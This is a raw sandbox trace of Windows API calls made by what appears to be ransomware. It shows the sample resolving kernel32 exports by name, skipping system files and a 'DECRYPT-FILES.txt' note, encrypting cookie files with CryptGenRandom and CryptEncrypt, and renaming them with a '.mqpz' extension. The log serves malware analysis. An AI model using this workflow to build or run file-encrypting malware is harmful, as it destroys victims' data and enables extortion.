[0079.631] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.631] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.631] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.631] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.631] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.631] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.631] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.631] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.631] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.631] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.631] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.631] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.631] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.632] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.632] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.632] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.632] lstrlenA (lpString="DELETEATOM") returned 10 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.632] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.632] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.632] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.632] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.632] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.632] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.632] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.632] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.632] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.632] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.632] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.632] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.632] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.633] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.633] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.633] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.633] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.633] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.633] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.633] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.633] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.633] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.633] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.633] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.633] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.633] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.633] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.633] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.633] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.633] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.633] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.634] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.634] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.634] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.634] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.634] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.634] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.634] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.634] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.634] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.634] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.634] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.634] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.634] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt") returned 116 [0079.634] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz") returned 121 [0079.635] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz"), dwFlags=0x0) returned 1 [0079.635] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.635] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.636] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.643] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x555a9a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x555a9a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x555a9a10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@www.bing[2].txt", cAlternateFileName="5PA943~1.TXT")) returned 1 [0079.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.643] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="autorun.inf") returned -1 [0079.644] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="boot.ini") returned -1 [0079.644] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="desktop.ini") returned -1 [0079.644] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="ntuser.dat") returned -1 [0079.644] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="iconcache.db") returned -1 [0079.644] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="bootsect.bak") returned -1 [0079.644] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="ntuser.dat.log") returned -1 [0079.644] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="thumbs.db") returned -1 [0079.644] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="Bootfont.bin") returned -1 [0079.644] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.bing[2].txt") returned 36 [0079.644] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.644] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.644] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.644] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.644] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.bing[2].txt") returned 36 [0079.644] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.644] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@www.bing[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" [0079.644] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.645] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=215) returned 1 [0079.645] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.645] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.646] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.646] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.646] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.647] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.648] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.648] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.648] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.649] CloseHandle (hObject=0x464) returned 1 [0079.649] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.649] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.649] CloseHandle (hObject=0x0) returned 0 [0079.650] CloseHandle (hObject=0x460) returned 1 [0079.655] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.656] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.656] GetTickCount () returned 0x114c67b [0079.656] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.656] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.656] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.657] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.657] lstrlenA (lpString="kernel32.dll") returned 12 [0079.657] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.657] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.657] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.657] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.657] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.657] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.657] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.657] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.657] lstrlenA (lpString="ADDATOMA") returned 8 [0079.657] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.657] lstrlenA (lpString="ADDATOMW") returned 8 [0079.657] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.657] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.657] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.657] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.657] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.657] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.658] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.658] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.658] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.658] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.658] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.658] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.658] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.658] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.658] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.658] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.658] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.658] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.658] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.658] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.658] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.658] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.658] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.658] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.659] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.659] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") 